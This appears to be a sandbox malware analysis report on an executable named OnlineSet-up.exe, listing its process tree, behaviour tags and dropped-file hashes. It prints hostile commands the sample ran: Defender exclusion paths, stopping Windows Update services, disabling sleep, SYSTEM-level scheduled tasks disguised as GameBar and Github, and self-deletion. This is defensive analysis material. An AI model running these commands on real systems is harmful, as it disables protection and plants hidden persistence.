cmd.exe powercfg.exe PID 4252 wrote to memory of 1504 4252 cmd.exe powercfg.exe PID 4252 wrote to memory of 2688 4252 cmd.exe powercfg.exe PID 4252 wrote to memory of 2688 4252 cmd.exe powercfg.exe PID 4252 wrote to memory of 1420 4252 cmd.exe powercfg.exe PID 4252 wrote to memory of 1420 4252 cmd.exe powercfg.exe PID 4252 wrote to memory of 1716 4252 cmd.exe powercfg.exe PID 4252 wrote to memory of 1716 4252 cmd.exe powercfg.exe PID 2404 wrote to memory of 1168 2404 GameBar.exe conhost.exe PID 2404 wrote to memory of 4608 2404 GameBar.exe dwm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3128
-
C:\Users\Admin\AppData\Local\Temp\Folder\OnlineSet-up.exe"C:\Users\Admin\AppData\Local\Temp\Folder\OnlineSet-up.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1488
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe"C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /sc MINUTE /mo 1 /tn "Github" /tr "C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe" /f5⤵
- Creates scheduled task(s)
PID:4784
-
-
-
C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe"C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3728
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1172
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3956
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4828
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3596
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4260
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GameBar"2⤵PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1812
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4500
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1256
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:636
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3988
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5000
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1504
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2688
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1420
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3628
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1168
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4608
-
-
C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe"C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2404
-
C:\Users\Admin\AppData\Roaming\Github\SourceCode.exeC:\Users\Admin\AppData\Roaming\Github\SourceCode.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3528
-
C:\Users\Admin\AppData\Roaming\Github\SourceCode.exeC:\Users\Admin\AppData\Roaming\Github\SourceCode.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:812
-
C:\Users\Admin\AppData\Roaming\Github\SourceCode.exeC:\Users\Admin\AppData\Roaming\Github\SourceCode.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4572
-
C:\Users\Admin\AppData\Roaming\Github\SourceCode.exeC:\Users\Admin\AppData\Roaming\Github\SourceCode.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1844
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.8MB
MD58efb0a8fd404d31541b7592cae776e58
SHA11be6c32c0a13a1f76b9eeed08b46192ceb197d29
SHA2566bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0
SHA512a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6
-
Filesize
5.8MB
MD58efb0a8fd404d31541b7592cae776e58
SHA11be6c32c0a13a1f76b9eeed08b46192ceb197d29
SHA2566bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0
SHA512a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
5.8MB
MD58efb0a8fd404d31541b7592cae776e58
SHA11be6c32c0a13a1f76b9eeed08b46192ceb197d29
SHA2566bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0
SHA512a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6
-
Filesize
5.8MB
MD58efb0a8fd404d31541b7592cae776e58
SHA11be6c32c0a13a1f76b9eeed08b46192ceb197d29
SHA2566bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0
SHA512a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6
-
Filesize
5.8MB
MD58efb0a8fd404d31541b7592cae776e58
SHA11be6c32c0a13a1f76b9eeed08b46192ceb197d29
SHA2566bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0
SHA512a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
C:\Users\Admin\AppData\Local\analworker\Admin@[email protected]\Processes.txt
Filesize4KB
MD5a5d166b8c174d1530f6520635ad7c260
SHA1762cb38862a3fd6ee8ef3fcf268aa35e32f22ba1
SHA25668511d4448840dbabebf5f50018bc43848a1d30c6d489ec2d613048318bd102a
SHA512b4320f0271aea782190023da9dccf22b309e4af7a5c1762d349d1bdcdae469cc80fef95016a1ccf2dd733a50cc8f5b8ccbb83e0f155ae9c611515b0903b8c5e5
-
C:\Users\Admin\AppData\Local\analworker\Admin@[email protected]\Software.txt
Filesize4KB
MD5ba677776671f5a143438935d549bccc2
SHA1cb4efbb91ae2dfc3ddc24a5e242619168ac57587
SHA256df5b6d7f6f0fbcc13b3bb8f168cb5cc0c9e80f6c5845f844c8ea675221e7e2c1
SHA5127099cacb87ca621e8eb9c60253d307efb614afe1de5f0c3966eecf0da64d8b54acc7847069ba2d9bf44bd39ad270e6fe79ae1b9c6b296cdb137a1b1a9aedc721
-
Filesize
13B
MD5ddce339c651cba9679e98cf57560521c
SHA1fc0e9b2a6e9a6a040dac8ad04a3167cde86a78a4
SHA256fdc827169da5fae6bdc3b0db350d275d30ffc08853fe498d935357d3f14486b2
SHA512785c0c638ce7567718fc6da60dda5a18acd6fe389496b405eb749ce8af60cd9e84049e5ae9150f4559169750470b0c7055828371e3233bc4caeaf03dbbe77ad8
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
Filesize
3.2MB
MD59cc257fc84391b1bf3c6e44876277785
SHA13b33f244f578ab0ee9dc8926c754f0116c9ffa41
SHA2568cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a
SHA512c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5